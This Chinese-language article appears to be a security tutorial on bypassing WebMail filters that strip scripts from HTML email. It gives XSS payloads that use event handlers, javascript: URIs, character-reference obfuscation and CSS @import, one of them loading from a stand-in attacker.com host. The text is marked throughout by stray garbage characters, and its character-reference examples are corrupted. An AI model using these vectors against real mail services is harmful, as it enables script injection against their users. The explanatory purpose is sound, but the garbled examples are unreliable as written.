鑒于腳本程序可能帶來的危險,WebMail系統完全有必要禁止html郵件中的腳本程序�。禁止腳本程序的基本做法就是過濾掉html源程序中能夠使腳本程序運行的代碼����,如script元素等���,在這方面做的最好的莫過于hotmail了�。下面是些常見的繞過腳本程序過濾的方法�����,不少的WebMail系統仍然沒有完全改正:
(1) 在html語言里����,除了script元素內的或在script元素內引入的腳本程序能在html頁面裝載時被運行外��,使用事件屬性也能調用腳本程序運行�����,事件屬性在JavaScript語言里被稱為事件句柄��,用于對頁面上的某個特定事件(如鼠標點擊���、表單提交)做出響應,驅動javascript程序運行�。它的語法如下:
<tag attribute1 attribute2 onEventName="javascript code����;">
例如:
<body onload="alert('JavaScript#1 is executed');">
<a href="#" onclick="alert('JavaScript#2 is executed')�;">Click here</a>
<form method="post" action="#" onsubmit="alert('JavaScript#3 is executed');">
<input type="submit" value="Submit">
</form>
</body>
(2) URI(Universal Resource Identifier:通用資源標識)用于定位Internet上每種可用的資源�,如HTML文檔、圖像��、聲音等����。瀏覽器根據URI的資源類型(URI scheme)調用相應的程序操作該資源�����,如果把一些元素的URI屬性值的資源類型設為javascript��,則能夠調用javascript程序運行。語法如下����,注意要用“;”分隔不同的javascript語句:
?���。紅ag attribute="javascript:javascript-code;">
例如:
<body background="javascript:alert('JavaScript#1 is executed')����;">
<a href="javascript:alert('JavaScript#2 is executed');">Click here</a>
<form method="post" action="javascript:alert('JavaScript#3 is executed')���;">
<input type="submit" value="Submit">
</form>
<img src="javascript:alert('JavaScript#4 is executed')���;">
</body>
(3) 由于軟硬件或其他原因�,一些冷僻或特殊的字符不能輸入或正確顯示在html頁面上�����,為了解決這個問題��,html中可以使用SGML字符參考����。字符參考是一種用來指定文檔字符集中任何字符的獨立編碼機制,以“&”開始�����,以“�;”結束。字符參考有兩種表達方式:數字字符參考和實體字符參考�����。數字字符參考的語法為“&#D����;”(D代表一個十進制數),或“&#xH��;”、“&#XH����;”(H代表一個十六進制數),例如“A����;”、“A��;”表示字母“A”��,“水�;”�����、“水��;”表示漢字“水”���。
攻擊者把html語句里的一些字符以數字字符參考來代替�,這樣能避開WebMail系統對腳本程序的過濾�。需要注意的是���,元素和屬性不可以用字符參考表示,例如:
<body>
<img lowsrc="ja�����;vasC�����;ript:alert('JavaScript#1 is executed')">
<a href="j���;avA��;sC����;ript:�;aler;t('JavaScript#2
i����;s executed')">Click here;</a>
<form method="post" action="javascript:alert('JavaScript#3 is
executed')">
<input type="S;ubmit" value="Submit">
</form>
</body>
(4) 樣式表是層疊樣式表單(CSS:Cascading Style Sheet)的簡稱�����,用于控制���、增強或統一網頁上的樣式(如字體�、顏色等)�,它能夠將樣式信息與網頁內容相分離,在html語言的style標簽內可以用@import聲明輸入一個樣式表����。但是,如果輸入的資源類型或內容是javascript�,Internet Explorer瀏覽器仍然會執行。
例如: <style type="text/css">
<!--
@import url(javascript:alert('JavaScript#1 is executed'))����;
@import url(http://www.attacker.com/js.css)�;
-->
</style>
其中http://www.attacker.com/js.css的內容如下所示:
@import url(javascript:alert('JavaScript#2 is executed'));
@import url(javascript:eval(String.fromCharCode
(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,
108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)))�����;
能夠繞過WebMail系統對腳本程序過濾的方法遠不止上面所說的這些,例如曾有人發現把“<script>”標簽改成“<_a<script>”和“<<script>”的樣子能繞過yahoo電郵的過濾����,這個漏洞yahoo在最近才改正過來。
